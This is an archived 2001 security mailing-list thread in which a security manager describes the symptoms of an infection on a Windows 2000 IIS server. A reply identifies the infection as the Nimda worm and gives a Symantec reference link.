TO UNSUBSCRIBE: email "unsubscribe issforum" in the body of your message to
majordomoiss.net Contact issforum-owneriss.net for help with any problems!
----------------------------------------------------------------------------

The virus is called W32.Nimda.Amm the url for it at Symantec is
mm.html">http://www.symantec.com/avcenter/venc/data/w32.nimda.amm.html

Gambler
Director of Internet Security
Cyberangels.org and CyberLawEnforcement.com

At 12:07 PM 9/18/2001, Roy Wilkinson wrote:

>TO UNSUBSCRIBE: email "unsubscribe issforum" in the body of your message to
>majordomoiss.net Contact issforum-owneriss.net for help with any problems!
>----------------------------------------------------------------------------
>
>Hi Everyone,
>
>This is not exactly an ISS product-related question, so I apologize in
>advance if this is out of the scope of the forum. However, I was wondering
>if any of you had encountered a virus with the following characteristics (or
>similar), and, if so, if you know of a fix. This was reported to me as
>appearing on a Windows 2000 machine, running IIS, today.
>
>The virus apparently:
>
> - Creates a file "admin.dll" in the root directory
> - Makes Registry changes to add or attach this "admin.dll" to Explorer,
>such that it runs automatically
> - Adds the Guest account to the Administrators group
> - Starts up multiple TFTP processes (to several sites) in the background
> - Creates files named "tftp#", also in the root directory
> - Maybe more?
>
>I have not been able to find anything about this via McAfee,
>Symantec/Norton, CAI, F-Secure, Kapersky or Sophos. Cheyenne's A/V product
>also did not catch it. It has some similarities to Code Blue, so it may be
>a variant - who knows?. Any information would be helpful.
>
>Thanks in advance!
>
>Roy Wilkinson
>Manager of Security
> > WebTone Technologies
>Phone & Fax: (404) 439-8238
>Visit our website! http://www.webtonetech.com

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]